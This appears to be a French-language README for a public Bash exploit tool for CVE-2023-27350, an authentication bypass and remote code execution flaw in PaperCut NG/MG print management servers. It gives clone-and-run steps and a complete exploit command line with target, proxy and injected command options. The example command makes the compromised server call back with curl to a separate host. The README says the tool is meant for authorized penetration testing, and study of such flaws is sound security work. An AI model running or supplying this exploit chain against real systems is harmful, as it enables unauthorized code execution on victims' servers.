
Outil d'exploitation du contournement d'authentification et d'exécution de code à distance (RCE) PaperCut NG/MG. Implémentation Bash autonome de la chaîne d'exploitation PaperCut, avec prise en charge facultative d'un proxy, élévation de session automatisée et injection dynamique de commandes via le moteur de scripts d'impression. Conçu pour l'audit de sécurité et les tests d'intrusion autorisés.

Un exploit Bash rationalisé pour CVE-2023-27350. Ce script automatise le contournement de l'authentification, la préparation de l'environnement et l'injection de commandes via le moteur de script d'impression PaperCut.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : URL cible (ex. http://10.129.x.x:9191)-c : Commande à exécuter (entre guillemets)-x : (Facultatif) URL du proxy (ex. http://10.129.x.x:3128)